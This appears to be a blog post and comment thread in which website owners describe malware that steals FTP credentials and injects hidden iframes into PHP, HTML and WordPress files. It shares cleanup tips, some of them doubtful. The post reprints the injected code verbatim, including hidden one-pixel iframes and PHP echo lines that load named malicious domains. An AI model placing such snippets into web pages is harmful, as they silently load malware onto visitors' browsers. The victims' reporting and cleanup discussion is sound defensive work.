LIP SERVICEIs FTP Virus Attaching Iframes To My Web Pages From Goooogleadsence.biz, LotAnte.cn, TheLotBet.cn, and HyperLiteAutoServices.cn
Goooogleadsence.biz, LotAnte.cn, TheLotBet.cn, HyperLiteAutoServices.cn and others
All directories and most pages on my websites have been edited by an outside source. Somehow, I believe, a worm spreading via my ftp filezilla client. Supposedly, there is a malicious code on my PC that is uploading the links to
internetcountercheck.com / click 3799328
goooogleadsence.biz / click sd3c45
lotante.cn/ income 37
thelotbet.cn/in.cgi?income39
I’ve learned that it’s probably something malicious or viral on MY MACHINE that’s making it’s way to my sites via my FILE Zilla FTP client. It’s editing or adding footers with iframes to my php and html pages.
I don’t allow any downloads to my machine, I mean, I keep a close eye on the activity, but, I do share this PC on a network with another PC in the home. Coincidentally, something went haywire with the other machine during all this fiasco – and I had to reinstall the operating system, Win XP Home. Maybe some viral junk migrated through the home network somehow and then started eating away at my site files.
This is awlful. I have so much editing to do and I don’t even know how this happened. I do not know how to prevent this happening again. This is why I am taking so long to fix the files, I feel like I’m fighting a losing battle.
My antivirus software quarantined a couple of things – I don’t remember what they were, and I can’t access the virus chest because of my PC settings. I think I have been the butt of an April Fools Virus.
echo iframe src=\”http://internetcountercheck.com/?click=3799328\” width=1 height=1 style=\”visibility:hidden;position:absolute\
echo iframe src=\”http://goooogleadsence.biz/?click=5D3C49\” width=1 height=1 style=\”visibility:hidden;position:absolute iframe
?>
iframe src=”http://lotante.cn/in.cgi?income37″ width=1 height=1 style=”visibility: hidden”/iframe>
frame src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”iframe
….
OMG, I was hand editing all the files and WordPress installations on my sites. I got so tired and worried about missing something, that I just went ahead and re uploaded wordpress 2.71 instead of trying to find all the files on each site and directory. The plus side, I suppose, is that some of my WordPress installations were really due for an update.
The following directories/files were contaminated with some kind of altering which placed IFRAMES to roguish sites. What a bummer. What a hassel. What a waste of important coding time. Seriously!!
WP INCLUDES/DEFAULT FILTER PHP
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP CONTENT/INDEX
(?php
// Silence is golden.
?)
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP ADMIN / index-extra.php
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP ADMIN / INDEX
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
echo “(iframe src=\”http://internetcountercheck.com/?click=3763531\” width=1 height=1 style=\”visibility:hidden;position:absolute\”)(/iframe)”;
echo “(iframe src=\”http://goooogleadsence.biz/?click=5C9FF9\” width=1 height=1 style=\”visibility:hidden;position:absolute\”)(/iframe)”;
?)
(iframe src=”http://lotante.cn/in.cgi?income37″ width=1 height=1 style=”visibility: hidden”)(/iframe)
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
Hello everybody, my name is Roberto and I live in Brazil. I managed to put a stop to this problem. I just kept giving permission (444) on the server for all my files index.htm, index.html, index.php and others who were also infected. Now the problem no longer exists. Thank you Lord my God.
Guys, this virus can steal FTP passwords even they are NOT stored on your computer. It’s enough to log in… sometimes even if your computer is clean, but some other on the LAN isn’t. See here.
It’s also attacking default.asp, home.asp, login.asp and adds the code with iframes pointing to following URLs:
zenitchampion.cn/nic/main.php
vipprojects.cn
delzzerro.cn
updatedate.cn
Fortunately the asp files are not affected, because double quotes in the malicious code are not escaped and the ASP server can not render the page and generates an error.
All 4 websites I’m managing that had the code attached are hosted by godaddy.
I’m uploading clean files using Total Commander ftp and they are clean after the upload. After several days they get infected again. Other websites I manage are hosted by webecs and do not have these problems at all.
I think that this is godaddy issue. I’m going to call them.
This Virus is extremely hard to deal with. Sites that have any php code, are affected the most. It seems like the virus initiates from an infected pc. I have tried so many different things without any luck. The best thing to do is to use an older copy of the website if you have one. If not, try to clean the infected files by scanning them in avast (which is by far the best anti virus that catches this malicious virus) note the files that are infected then open them in dreamweaver and search for “iframe” in the source code. You will see the ifram script. Delete the entire script and then save the file. Make sure you search for the iframe word more than once to be 100% sure that you delete all references to it in the code. Once you clean the files, go to a clean pc and change both your ftp and cpanel passwords. then using the clean pc, upload the files that you cleaned. This is about the only way of dealing with this piece of crap. May God burn the creator of this virus in hell…
I am as sad as you all guys. I have had this problem frequently and would reinstall everything. change passwords. if virus hit my site. I format my pc and the process goes on. You know, I am very happy that i am not the only one who faces this virus shock
There is hope for some solution!
Same probelms here. 30 of my sites are affected. I cleaned the iframe script in all index pages but it kept on appearing again. My hosting provider gave me a breather for 10 days. They ran a cleaning script on the server. Now today it appeared again on 1 site, I fear it will infect all my sites again….did any one find a solution?
we use cuteFTP pro and a few days ago we saw that most websites have been infected. we spent 2 days wiping the hard drive and reinstalling everything. i used my laptop from home to change all client passwords and will not store passwords on my ftp programs ever again.
also everything with the word HOME, INDEX, DEFAULT and MAIN had gotten infected with the damn crap and some of the footers have been compromised.
here’s looking at some ulcers!
I had that to remake all the infectadas pages, I am of the Brazil. The ideal is to use SFTP, that is safer.
I dont know if it was posted, so i tried again LOL sorry
I have faced the same problem. i made format to my pc 5 times, i bought a new laptop to try and see if the problem from my pc, and i have uploaded empty html page with filezilla, few mins later i saw that i have addidional this iframe malaware, what pissed me is that i saw my site on google saying that my site is malaware.
hell this is giving me headaches
I recommend (before pulling your hair out) – install AVAST free virus protection onto your COMPUTER and always run onboard protection with its web scanner activated. Clean up your machine. Don’t store passwords in your FTP client. CLEAN UP YOUR WEBSITES BY HAND, or like me on some websites, Replace all WordPress files (BE CAREFUL OF YOUR CONTENT FOLDER),and, yes, your themes will need a hand edit most likely.
any idea how to stop that,
Don’t be so sure on that. Look at the post above carefully. I had this in my DEFAULT FILTER PHP also! Take care.
I am also experiencing the same problem. What I have observed is that the virus only affect files having word “index” in it. Not all the pages are getting infected.
I have scanned my PC several times but nothing found in it.
Is this reoccuring for anyone? Must have cleaned 500 sites at this stage! Thrown infected of in the bin. Has anyone found that command prompt does not work?
yes, this is a horrible problem. I saw that and few days back i removed it from my friend’s website.
Had the same problems. Over 50 websites hit! The files on my computer are not changed, but yes when uploading with filezilla for some reason they are cahnged to add these Iframes. Not the end of the world if all I have to do is change the ftp password and reupload the sites, but I just hope it is not a reoccuring thing. Godaddy says its nothing on their end, if that makes a difference to anyone.
Having the same problem, are all mostly filezilla users? How do we stop this?
I’ve had the same trouble just recently. My experience:
My computer suddenly became deluged with viruses after visiting a web hosting site… shortly thereafter I noticed this type of malicious code in html files for several of my websites, some on different hosting servers and account.
My take on it:
The only thing I can think of is a virus hopped onto my computer from the hosting website, and this virus is inserting code into my html files.
The question:
Does this virus simply search computers for html files and insert the code? I use Microsoft Expression Web exclusively for uploading and editing – is this virus acting through Expression Web? What programs do you all use for editing and uploading?
This seems like a new virus hitting the web (?), hopefully the authorities will be alerted to it soon and we can get some comprehensive protection.
Woa, that’s happened to me for the first time…I thought my site was hackproof?! Any news on how to prevent this from happeneing?
Man, they got almost every site in my Filezilla FTP. They obviosly have figured out how to steal the passwords. I have had to fix about 10 sites I want to f***ing kill these guys
My website also got the same problem. modified by iframe and even login with ftp account from different ip addresses. These guys are nasty.
Another step I’m taking is reinstalling all my wordpress scripts.
Also, I have to hand edit a bunch of my html files and remove this ridiculous code. I’m sure there is an easier way, but, I’m flamoxxed!
Hey, you need to NOT SAVE PASSWORDS in filezilla once you’ve changed them!!
I’ve had this happen to a lot of sites recently. Also using filezilla. It’s happened twice to some sites. Also filezilla stores passwords locally in XML files without any encryption. I changed all passwords but I reckon we missed 1 or 2 which got rehit. We ran avast, adaware, spybot, malware bytes, pctools and nothin detected. Not sure wat to do!!!!
I’m experiencing the same problem. Have you have any joy resolving it? What steps have you taken?
bradfieldsbrain [at] googlemail.com